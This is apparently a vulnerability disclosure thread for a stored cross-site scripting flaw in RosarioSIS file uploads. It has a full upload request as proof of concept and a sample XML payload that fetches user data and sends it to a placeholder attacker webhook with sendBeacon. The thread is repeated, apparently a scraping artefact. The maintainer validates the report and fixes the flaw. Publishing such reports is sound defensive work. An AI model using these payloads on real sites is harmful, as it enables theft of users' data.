Cross-site scripting - Stored via upload xml file in francoisjacquet/rosariosis

Valid

Reported on

Apr 23rd 2022

Description

When user upload file with XML extension in white-list, server will stored XML file at assets/PortalNotesFiles/, so we can direct access and execute javascript code.

Proof of Concept

POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2762
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"

<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"

<h1>123</h1>
![]("/>)
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.xml"
Content-Type: image/png

<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"


-----------------------------3345002182489293764621537208--

PoC images

Impact

This vulnerability can be arbitrarily executed javascript code, steal user'cookie, etc...

Occurrences

FileUpload.fnc.php L842

References

https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. 2 years ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago

Nhien.IT modified the report

2 years ago

Nhien.IT

commented 2 years ago

Researcher

Hi @admin, can you contact with maintainer?

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back 2 years ago

Jamie Slome

commented 2 years ago

Admin

@nhienit2010 - contact has been established with the maintainer, as you can see in the status message above 👍

Let me know if you have any further questions.

François Jacquet François

commented 2 years ago

Maintainer

Hello @nhienit2010

Thank you for reporting the issue. The xml file is opened in a new browser tab. As far as my test goes, I was not able to retrieve the session cookie. Were you? If so, please update your example.

François Jacquet François

commented 2 years ago

Maintainer

Oh, cookie is set to HttpOnly so it cannot be retrieved.

Now, being in a new tab, the xml file is executed by the browser just like any other file you might open or find on the Internet.

Could you please explain how this could leak user session or other info related to RosarioSIS?

Nhien.IT

commented 2 years ago

Researcher

Hello @maintainer,

Because XML file upload in your website, so with same origin policy, so javascript code in the malicous XML allow fetch other user information and send to attacker's host, sometime this vulnerability allow attacker perform HTTP request in victim browser.

Sample payload

<html>
    <head></head>
    <body>
        <info>
          <name>
<value><![CDATA[<script>fetch("https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php").then(r=>r.text()).then(d=>navigator.sendBeacon("https://<my-webhook>", d))</script>]]></value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

Image PoC

François Jacquet validated this vulnerability 2 years ago

Nhien.IT has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

François Jacquet marked this as fixed in 8.9.5 with commit 90842c 2 years ago

François Jacquet has been awarded the fix bounty

This vulnerability will not receive a CVE

FileUpload.fnc.php#L842 has been validated

to join this conversation

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. 2 years ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago

Nhien.IT modified the report

2 years ago

Nhien.IT

commented 2 years ago

Researcher

Hi @admin, can you contact with maintainer?

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back 2 years ago

Jamie Slome

commented 2 years ago

Admin

@nhienit2010 - contact has been established with the maintainer, as you can see in the status message above 👍

Let me know if you have any further questions.

François Jacquet François

commented 2 years ago

Maintainer

Hello @nhienit2010

Thank you for reporting the issue. The xml file is opened in a new browser tab. As far as my test goes, I was not able to retrieve the session cookie. Were you? If so, please update your example.

François Jacquet François

commented 2 years ago

Maintainer

Oh, cookie is set to HttpOnly so it cannot be retrieved.

Now, being in a new tab, the xml file is executed by the browser just like any other file you might open or find on the Internet.

Could you please explain how this could leak user session or other info related to RosarioSIS?

Nhien.IT

commented 2 years ago

Researcher

Hello @maintainer,

Sample payload

<html>
    <head></head>
    <body>
        <info>
          <name>
<value><![CDATA[<script>fetch("https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php").then(r=>r.text()).then(d=>navigator.sendBeacon("https://<my-webhook>", d))</script>]]></value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

Image PoC

François Jacquet validated this vulnerability 2 years ago

Nhien.IT has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

François Jacquet marked this as fixed in 8.9.5 with commit 90842c 2 years ago

François Jacquet has been awarded the fix bounty

This vulnerability will not receive a CVE

FileUpload.fnc.php#L842 has been validated

to join this conversation